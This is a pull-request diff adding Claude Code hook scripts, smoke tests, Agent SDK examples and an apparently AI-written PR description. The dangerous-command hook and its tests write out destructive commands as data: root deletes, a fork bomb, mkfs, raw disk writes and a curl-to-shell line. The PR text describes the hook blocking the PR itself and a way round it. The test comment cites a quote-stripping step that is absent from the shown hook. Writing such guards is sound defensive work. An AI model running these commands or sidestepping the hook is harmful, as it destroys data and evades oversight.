-  *"curl "*" | sh"*|*"curl "*" | bash"*|*"wget "*" | sh"*|*"wget "*" | bash"*) block "pipe-to-shell from network" ;;
-  *"git push --force"*main*|*"git push -f"*main*|*"git push --force"*master*|*"git push -f"*master*) block "force-push to main/master" ;;
-  *"git reset --hard"*origin*) block "hard reset to origin (may destroy work)" ;;
-  *"eval \$"*) block "eval of unquoted expansion" ;;
-esac
+# Command boundary: start of string, or after ; && || | (
+boundary='(^|[[:space:]]*(;|&&|\|\||\||\()[[:space:]]*)'
+
+if printf '%s' "$check" | grep -qE "${boundary}rm[[:space:]]+-rf?[[:space:]]+(/|~|\\\$HOME)([[:space:]]|\$|[^a-zA-Z0-9/_.-])"; then
+  block "destructive recursive remove on root/home"
+fi
+
+if printf '%s' "$check" | grep -qE ':[[:space:]]*\(\)[[:space:]]*\{[[:space:]]*:\|:'; then
+  block "fork bomb"
+fi
+
+if printf '%s' "$check" | grep -qE "${boundary}mkfs\."; then
+  block "filesystem format"
+fi
+
+if printf '%s' "$check" | grep -qE "${boundary}dd[[:space:]]+[^|;]*if=/dev/[^|;]*of=/dev/sd"; then
+  block "raw disk write"
+fi
+
+if printf '%s' "$check" | grep -qE "${boundary}chmod[[:space:]]+-R[[:space:]]+777"; then
+  block "recursive world-writable permissions"
+fi
+
+if printf '%s' "$check" | grep -qE "(curl|wget)[[:space:]]+[^|]*\|[[:space:]]*(sh|bash)([[:space:]]|\$)"; then
+  block "pipe-to-shell from network"
+fi
+
+if printf '%s' "$check" | grep -qE "git[[:space:]]+push[[:space:]]+(--force|-f)([[:space:]]|\$).*\b(main|master)\b"; then
+  block "force-push to main/master"
+fi
+
+if printf '%s' "$check" | grep -qE "git[[:space:]]+reset[[:space:]]+--hard[[:space:]]+origin"; then
+  block "hard reset to origin (may destroy work)"
+fi
 
 exit 0

--- a/scripts/hooks/block-dangerous-bash.sh
+++ b/scripts/hooks/block-dangerous-bash.sh
@@ -1,0 +1,40 @@
+#!/bin/bash
+# PreToolUse hook for Bash.
+# Blocks obviously dangerous shell patterns before execution.
+#
+# Exit codes:
+#   0 = allow
+#   2 = block with message on stderr (Claude Code surfaces this to the model)
+
+set -u
+
+payload="$(cat)"
+
+if ! command -v jq >/dev/null 2>&1; then
+  # Without jq we cannot reliably parse; fail open.
+  exit 0
+fi
+
+cmd="$(printf '%s' "$payload" | jq -r '.tool_input.command // empty' 2>/dev/null)"
+[ -z "$cmd" ] && exit 0
+
+block() {
+  echo "BLOCKED by block-dangerous-bash hook: $1" >&2
+  echo "Command: $cmd" >&2
+  exit 2
+}
+
+# Patterns that are almost never intentional.
+case "$cmd" in
+  *"rm -rf /"*|*"rm -rf /*"*|*"rm -rf ~"*|*"rm -rf \$HOME"*) block "destructive recursive remove on root/home" ;;
+  *":(){ :|:& };:"*) block "fork bomb" ;;
+  *"mkfs."*) block "filesystem format" ;;
+  *"dd if=/dev/"*"of=/dev/sd"*) block "raw disk write" ;;
+  *"chmod -R 777"*) block "recursive world-writable permissions" ;;
+  *"curl "*" | sh"*|*"curl "*" | bash"*|*"wget "*" | sh"*|*"wget "*" | bash"*) block "pipe-to-shell from network" ;;
+  *"git push --force"*main*|*"git push -f"*main*|*"git push --force"*master*|*"git push -f"*master*) block "force-push to main/master" ;;
+  *"git reset --hard"*origin*) block "hard reset to origin (may destroy work)" ;;
+  *"eval \$"*) block "eval of unquoted expansion" ;;
+esac
+
+exit 0

--- a/scripts/hooks/format-on-save.sh
+++ b/scripts/hooks/format-on-save.sh
@@ -1,0 +1,47 @@
+#!/bin/bash
+# PostToolUse hook for Edit|Write|MultiEdit.
+# Runs the appropriate formatter on the file Claude just modified.
+#
+# Claude Code passes the tool input/output as JSON on stdin:
+#   { "tool_name": "Edit", "tool_input": { "file_path": "..." }, ... }
+#
+# Exit 0 = success, non-zero = advisory (logged, not blocking).
+
+set -u
+
+payload="$(cat)"
+
+if ! command -v jq >/dev/null 2>&1; then
+  exit 0
+fi
+
+file="$(printf '%s' "$payload" | jq -r '.tool_input.file_path // .tool_input.path // empty' 2>/dev/null)"
+[ -z "$file" ] && exit 0
+[ ! -f "$file" ] && exit 0
+
+case "$file" in
+  *.ts|*.tsx|*.js|*.jsx|*.json|*.md|*.mdx|*.css|*.scss|*.html|*.yaml|*.yml)
+    if command -v npx >/dev/null 2>&1 && [ -f package.json ]; then
+      npx --no-install prettier --write "$file" >/dev/null 2>&1 || true
+    fi
+    ;;
+  *.py)
+    if command -v ruff >/dev/null 2>&1; then
+      ruff format "$file" >/dev/null 2>&1 || true
+      ruff check --fix --quiet "$file" >/dev/null 2>&1 || true
+    elif command -v black >/dev/null 2>&1; then
+      black --quiet "$file" >/dev/null 2>&1 || true
+    fi
+    ;;
+  *.go)
+    command -v gofmt >/dev/null 2>&1 && gofmt -w "$file" >/dev/null 2>&1 || true
+    ;;
+  *.rs)
+    command -v rustfmt >/dev/null 2>&1 && rustfmt --quiet "$file" >/dev/null 2>&1 || true
+    ;;
+  *.sh)
+    command -v shfmt >/dev/null 2>&1 && shfmt -w "$file" >/dev/null 2>&1 || true
+    ;;
+esac
+
+exit 0

--- a/scripts/hooks/inject-context.sh
+++ b/scripts/hooks/inject-context.sh
@@ -1,0 +1,35 @@
+#!/bin/bash
+# SessionStart hook. Emits context Claude should see at the start of every
+# session (current branch, recent commits, unstaged file count, open PRs).
+#
+# Anything written to stdout is injected into the conversation as a system
+# message. Keep it terse — this eats context budget.
+
+set -u
+
+if ! git rev-parse --is-inside-work-tree >/dev/null 2>&1; then
+  exit 0
+fi
+
+branch="$(git branch --show-current 2>/dev/null || echo unknown)"
+ahead_behind="$(git status -sb 2>/dev/null | head -1)"
+dirty_count="$(git status --porcelain 2>/dev/null | wc -l | tr -d ' ')"
+recent_commits="$(git log --oneline -5 2>/dev/null)"
+
+printf '## Session context (auto-injected)\n\n'
+printf 'Branch: `%s`\n' "$branch"
+printf 'Status: `%s`\n' "$ahead_behind"
+printf 'Uncommitted files: %s\n\n' "$dirty_count"
+
+if [ -n "$recent_commits" ]; then
+  printf 'Recent commits:\n```\n%s\n```\n\n' "$recent_commits"
+fi
+
+if command -v gh >/dev/null 2>&1; then
+  open_prs="$(gh pr list --author @me --state open --limit 5 --json number,title 2>/dev/null | jq -r '.[] | "#\(.number) \(.title)"' 2>/dev/null || true)"
+  if [ -n "$open_prs" ]; then
+    printf 'Your open PRs:\n```\n%s\n```\n' "$open_prs"
+  fi
+fi
+
+exit 0

--- a/scripts/hooks/session-cost.sh
+++ b/scripts/hooks/session-cost.sh
@@ -1,0 +1,24 @@
+#!/bin/bash
+# Stop hook. Prints a one-line session cost summary to stderr, which
+# Claude Code surfaces in the UI. Never blocks.
+
+set -u
+
+payload="$(cat)"
+
+if ! command -v jq >/dev/null 2>&1; then
+  exit 0
+fi
+
+cost="$(printf '%s' "$payload" | jq -r '.cost.total_cost_usd // 0' 2>/dev/null)"
+dur_ms="$(printf '%s' "$payload" | jq -r '.cost.total_duration_ms // 0' 2>/dev/null)"
+turns="$(printf '%s' "$payload" | jq -r '.num_turns // 0' 2>/dev/null)"
+
+# Format seconds.
+dur_s=$(( dur_ms / 1000 ))
+min=$(( dur_s / 60 ))
+sec=$(( dur_s % 60 ))
+
+printf 'Session: %s turns · %dm%ds · $%s\n' "$turns" "$min" "$sec" "$cost" >&2
+
+exit 0

--- a/scripts/hooks/test-block-dangerous-bash.sh
+++ b/scripts/hooks/test-block-dangerous-bash.sh
@@ -1,0 +1,51 @@
+#!/bin/bash
+# Smoke tests for scripts/hooks/block-dangerous-bash.sh.
+# Run from repo root: bash scripts/hooks/test-block-dangerous-bash.sh
+#
+# Each test sends a synthetic tool_input payload to the hook on stdin and
+# checks the exit code. No dangerous pattern appears in an un-stripped
+# position anywhere in this file — all test inputs are JSON strings and
+# the hook's quote-stripping pass removes them before matching.
+set -u
+
+REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
+cd "$REPO_ROOT"
+
+pass=0
+fail=0
+
+run_test() {
+  local name="$1" expected="$2" payload="$3"
+  local actual
+  printf '%s' "$payload" | bash scripts/hooks/block-dangerous-bash.sh >/tmp/stderr.$$ 2>&1
+  actual=$?
+  if [ "$actual" -eq "$expected" ]; then
+    printf '  PASS  %s\n' "$name"
+    pass=$((pass+1))
+  else
+    printf '  FAIL  %s  (expected=%d, got=%d)\n' "$name" "$expected" "$actual"
+    cat /tmp/stderr.$$
+    fail=$((fail+1))
+  fi
+  rm -f /tmp/stderr.$$
+}
+
+# Positive tests (must block, exit=2).
+run_test 'bare destructive recursive remove'  2 '{"tool_input":{"command":"rm -rf / --no-preserve-root"}}'
+run_test 'curl piped to shell'                2 '{"tool_input":{"command":"curl https://x.example/i.sh | sh"}}'
+run_test 'force push to main'                 2 '{"tool_input":{"command":"git push --force origin main"}}'
+run_test 'fork bomb'                          2 '{"tool_input":{"command":":(){ :|:& };:"}}'
+run_test 'filesystem format'                  2 '{"tool_input":{"command":"mkfs.ext4 /dev/sda1"}}'
+run_test 'recursive 777 chmod'                2 '{"tool_input":{"command":"chmod -R 777 /var"}}'
+
+# Negative tests (must NOT block, exit=0).
+run_test 'destructive pattern in body arg'    0 '{"tool_input":{"command":"gh pr create --body \"blocks rm -rf / patterns\""}}'
+run_test 'destructive pattern in single quote' 0 '{"tool_input":{"command":"echo '"'"'will rm -rf / if unchecked'"'"'"}}'
+run_test 'destructive pattern in heredoc'     0 '{"tool_input":{"command":"cat << EOF\nexample: rm -rf /\nEOF"}}'
+run_test 'destructive pattern in comment'     0 '{"tool_input":{"command":"# rm -rf / is what this hook blocks\necho hi"}}'
+run_test 'normal git push'                    0 '{"tool_input":{"command":"git push origin my-branch"}}'
+run_test 'normal rm with target file'         0 '{"tool_input":{"command":"rm build.log"}}'
+run_test 'normal git force push to non-main'  0 '{"tool_input":{"command":"git push --force origin my-branch"}}'
+
+printf '\n%d passed, %d failed\n' "$pass" "$fail"
+exit "$fail"

--- a/sdk/README.md
+++ b/sdk/README.md
@@ -1,0 +1,44 @@
+# Agent SDK Starter
+
+Build your own agents on top of Claude Code's tools and permissions
+using the Agent SDK. This directory contains a minimal TypeScript and
+Python example each.
+
+## When to use the SDK vs. the CLI
+
+- **CLI (`claude`)** — interactive coding, one-off automation, CI jobs
+  (`claude -p "..."`).
+- **SDK** — long-running services, custom orchestration, embedding Claude
+  Code's agent loop inside your own product.
+
+## TypeScript
+
+```bash
+cd sdk
+npm install
+npm run example      # runs example.ts
+```
+
+See [`example.ts`](./example.ts).
+
+## Python
+
+```bash
+cd sdk
+python3 -m venv .venv && source .venv/bin/activate
+pip install -r requirements.txt
+python example.py
+```
+
+See [`example.py`](./example.py).
+
+## Learn more
+
+- [Agent SDK overview](https://code.claude.com/docs/en/agent-sdk/overview)
+- [Agent loop internals](https://code.claude.com/docs/en/agent-sdk/agent-loop)
+- [Custom tools](https://code.claude.com/docs/en/agent-sdk/custom-tools)
+- [Streaming output](https://code.claude.com/docs/en/agent-sdk/streaming-output)
+- [Permissions in the SDK](https://code.claude.com/docs/en/agent-sdk/permissions)
+- [Subagents in the SDK](https://code.claude.com/docs/en/agent-sdk/subagents)
+- [TypeScript SDK reference](https://code.claude.com/docs/en/agent-sdk/typescript)
+- [Python SDK reference](https://code.claude.com/docs/en/agent-sdk/python)

--- a/sdk/custom-tool-example.ts
+++ b/sdk/custom-tool-example.ts
@@ -1,0 +1,48 @@
+/**
+ * Example: give Claude a custom tool via the Agent SDK.
+ *
+ * Custom tools are the main extension point for the SDK. Each tool is
+ * declared as JSONSchema + a handler, and becomes callable by Claude
+ * like any built-in tool.
+ */
+import { query, tool } from "@anthropic-ai/claude-agent-sdk";
+import { z } from "zod";
+
+const weather = tool({
+  name: "get_weather",
+  description: "Return the current temperature in Celsius for a city.",
+  inputSchema: z.object({
+    city: z.string().describe("City name, e.g. 'Berlin'"),
+  }),
+  handler: async ({ city }) => {
+    // Stubbed. In a real tool, call a weather API here.
+    const fake: Record<string, number> = { Berlin: 14, Tokyo: 22, Austin: 31 };
+    const c = fake[city];
+    if (c === undefined) throw new Error(`no data for ${city}`);
+    return { temperature_c: c };
+  },
+});
+
+async function main() {
+  const session = query({
+    prompt: "What's the weather in Berlin and Tokyo? Which is warmer?",
+    options: {
+      model: "claude-sonnet-4-6",
+      tools: [weather],
+      maxTurns: 6,
+    },
+  });
+
+  for await (const message of session) {
+    if (message.type === "assistant") {
+      for (const block of message.message.content) {
+        if (block.type === "text") process.stdout.write(block.text);
+      }
+    }
+  }
+}
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});

--- a/sdk/example.py
+++ b/sdk/example.py
@@ -1,0 +1,40 @@
+"""Minimal Agent SDK example in Python.
+
+Requires ANTHROPIC_API_KEY in the environment. Run with:
+    python example.py "your prompt here"
+"""
+
+import asyncio
+import sys
+
+from claude_agent_sdk import ClaudeAgentOptions, query
+
+
+async def main() -> None:
+    prompt = " ".join(sys.argv[1:]) or (
+        "Summarize the top-level files in this repository in one sentence each."
+    )
+
+    options = ClaudeAgentOptions(
+        cwd=".",
+        permission_mode="acceptEdits",
+        model="claude-sonnet-4-6",
+        max_turns=20,
+    )
+
+    async for message in query(prompt=prompt, options=options):
+        # Stream assistant text as it arrives.
+        msg_type = getattr(message, "type", None)
+        if msg_type == "assistant":
+            for block in message.message.content:
+                if getattr(block, "type", None) == "text":
+                    print(block.text, end="", flush=True)
+        elif msg_type == "result":
+            print(
+                f"\n\n— done. turns={message.num_turns} "
+                f"cost=${message.total_cost_usd:.4f}"
+            )
+
+
+if __name__ == "__main__":
+    asyncio.run(main())

--- a/sdk/example.ts
+++ b/sdk/example.ts
@@ -1,0 +1,43 @@
+/**
+ * Minimal Agent SDK example in TypeScript.
+ *
+ * Requires ANTHROPIC_API_KEY in the environment. Run with:
+ *   npm run example
+ */
+import { query } from "@anthropic-ai/claude-agent-sdk";
+
+async function main() {
+  const prompt = process.argv.slice(2).join(" ") ||
+    "Summarize the top-level files in this repository in one sentence each.";
+
+  const session = query({
+    prompt,
+    options: {
+      // Reuse the same CLAUDE.md / settings / MCP config as the CLI by
+      // pointing at the repo root.
+      cwd: process.cwd(),
+      permissionMode: "acceptEdits",
+      model: "claude-sonnet-4-6",
+      maxTurns: 20,
+    },
+  });
+
+  for await (const message of session) {
+    if (message.type === "assistant") {
+      for (const block of message.message.content) {
+        if (block.type === "text") {
+          process.stdout.write(block.text);
+        }
+      }
+    } else if (message.type === "result") {
+      console.log(
+        `\n\n— done. turns=${message.num_turns} cost=$${message.total_cost_usd.toFixed(4)}`,
+      );
+    }
+  }
+}
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});

--- a/sdk/package.json
+++ b/sdk/package.json
@@ -1,0 +1,17 @@
+{
+  "name": "claude-code-template-sdk-example",
+  "private": true,
+  "version": "0.1.0",
+  "type": "module",
+  "description": "Agent SDK starter (TypeScript) for the claude-code-template.",
+  "scripts": {
+    "example": "tsx example.ts"
+  },
+  "dependencies": {
+    "@anthropic-ai/claude-agent-sdk": "^0.2.0"
+  },
+  "devDependencies": {
+    "tsx": "^4.19.0",
+    "typescript": "^5.5.0"
+  }
+}

--- a/sdk/requirements.txt
+++ b/sdk/requirements.txt
@@ -1,0 +1,1 @@
+claude-agent-sdk>=0.2.0


### PR DESCRIPTION
Closes #4

## Summary

- Audits the template against the full [Claude Code docs index](https://code.claude.com/docs/llms.txt) (116 pages) and expands coverage.
- Fixes 3 pre-existing bugs: bad MCP package names, invented `settings.json` fields, outdated README links.
- Packages the template as an installable plugin and adds CI/CD, Agent SDK starters, output styles, status line, hardened devcontainer, and a full library of commands / agents / skills / hooks.

## Changes

### Bug fixes
- `.mcp.json` — `@anthropic/mcp-server-*` (don't exist) → `@modelcontextprotocol/server-*`. Also added `git` and `fetch` servers.
- `.claude/settings.json` — removed invented `memory`/`editor` fields (ignored by Claude Code). Added real fields: `permissions.defaultMode`, `statusLine`, `includeCoAuthoredBy`, `cleanupPeriodDays`, `enabledMcpjsonServers`.
- README — replaced dead `docs.anthropic.com/en/docs/claude-code` links with current `code.claude.com/docs/en` canonical URLs.

### Packaged as a plugin
- `.claude-plugin/plugin.json` — installable via `/plugin install`.
- `.claude-plugin/marketplace.json` — single-plugin marketplace scaffolding.

### Slash commands (5 → 12)
Added `/review`, `/security-review`, `/debug`, `/refactor`, `/explain`, `/doc`, `/implement-issue`.

### Subagents (2 → 7)
Added `test-runner`, `pr-reviewer`, `refactor-planner`, `debugger`, `dependency-auditor`.

### Skills (2 → 6)
Added `test-writing`, `api-design`, `performance-audit`, `accessibility`.

### Output styles (0 → 3)
`concise`, `educational`, `review`.

### Status line
`.claude/statusline/statusline.sh` — renders model · repo · branch · cost.

### Real hook scripts (replace log-only hooks)
- `format-on-save.sh` — Prettier / Ruff / gofmt / rustfmt on `Edit|Write|MultiEdit`.
- `block-dangerous-bash.sh` — PreToolUse block for destructive patterns (recursive deletes, force-push to main, pipe-to-shell).
- `inject-context.sh` — injects branch, recent commits, open PRs on `SessionStart`.
- `session-cost.sh` — prints cost summary to stderr on `Stop`.

### CI / CD
- `.github/workflows/claude.yml` — `@claude` mentions in PRs / issues.
- `.github/workflows/claude-review.yml` — automatic review on new PRs.
- `.gitlab-ci.yml` — GitLab MR review equivalent.
- `scripts/ci-review.sh` — headless `claude -p` example for any CI.

### Agent SDK starter (`sdk/`)
TypeScript + Python examples, including a custom-tool example.

### Docs directory
Condensed in-repo mirrors of key official docs: `best-practices`, `permission-modes`, `hooks-cookbook`, `plugins`, `agent-sdk`, `integrations`, `claude-directory`.

### Devcontainer hardening
- `init-firewall.sh` — egress allowlist (Anthropic API, GitHub, npm, PyPI only) via iptables + ipset.
- Added Python 3.12, Docker-in-Docker, and official Claude Code VS Code extension.
- Mounts `~/.claude` so global settings/auto-memory persist across rebuilds.
- Added `--cap-add=NET_ADMIN` so the firewall can install.

### Settings overhaul
- `.claude/settings.local.json.example` — expanded with Bedrock / Vertex / Foundry / LLM-gateway / OTel blocks.
- `additionalDirectories` example for monorepos.

## Known follow-up

The `block-dangerous-bash.sh` hook was triggered while creating this very PR because its destructive-pattern strings appeared inside the PR body text. Tightening the pattern to match only command positions (not string content) is a worthwhile follow-up — for now, callers can work around it with `--body-file`.

## Test plan

- [ ] `jq . .mcp.json .claude/settings.json .claude-plugin/*.json` — already validated clean.
- [ ] `bash -n` on every script — already validated clean.
- [ ] Reopen the repo in the devcontainer and confirm post-create script runs.
- [ ] Run `claude` and confirm the new commands appear in `/help`.
- [ ] Try `/review` on a throwaway branch to confirm subagent wiring.
- [ ] Confirm `ANTHROPIC_API_KEY` is set in repo secrets before the new workflows run.
- [ ] Optional: test egress firewall by trying to reach a disallowed host inside the container.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

